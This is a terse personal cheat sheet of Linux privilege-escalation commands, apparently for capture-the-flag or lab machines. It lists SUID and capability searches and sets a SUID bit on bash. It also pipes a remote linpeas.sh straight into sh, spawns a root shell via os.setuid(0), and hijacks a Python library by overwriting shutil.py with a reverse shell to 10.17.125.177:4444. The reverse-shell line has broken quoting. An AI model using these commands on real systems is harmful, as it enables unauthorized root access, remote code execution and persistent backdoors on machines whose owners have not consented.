find / -perm +6000 2>/dev/null | grep '/bin/'

--SUID--
find / -perm /4000 -type f -exec ls -ld {} \; 2>/dev/null

--set SUID Prem--
chmod 4755 /data/bash

--capabilities--
getcap -r / 2>/dev/null

cat /etc/crontab

find / -group groupname 2>/dev/null

grep -Ri user 2>/dev/null

python3 -m http.server
	
wget http://10.17.125.177:8000/FILE

curl POST http://10.17.125.177:8000/ 

curl -L http://10.17.125.177:80/linpeas.sh | sh

curl -L http://10.17.125.177:80/pspy64

wget http://10.17.125.177:80/linpeas.sh 

python3 -c 'import pty; pty.spawn("/bin/bash")'


python3.7 -c 'import os; os.setuid(0); os.system("/bin/bash")'


find other user exec
	find / -type f -user server-management -exec ls -l {} + 2>/dev/null
	
grep -iRl "One Piece" /home /usr 2> /dev/null
python hijack	
echo "import os,pty,socket; s=socket();s.connect(("10.17.125.177",4444));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("sh")> /usr/lib/python3.8/shutil.py

PID Processes/running services

ps -aux --sort=pid

systemctl list-units --type=service --state=running
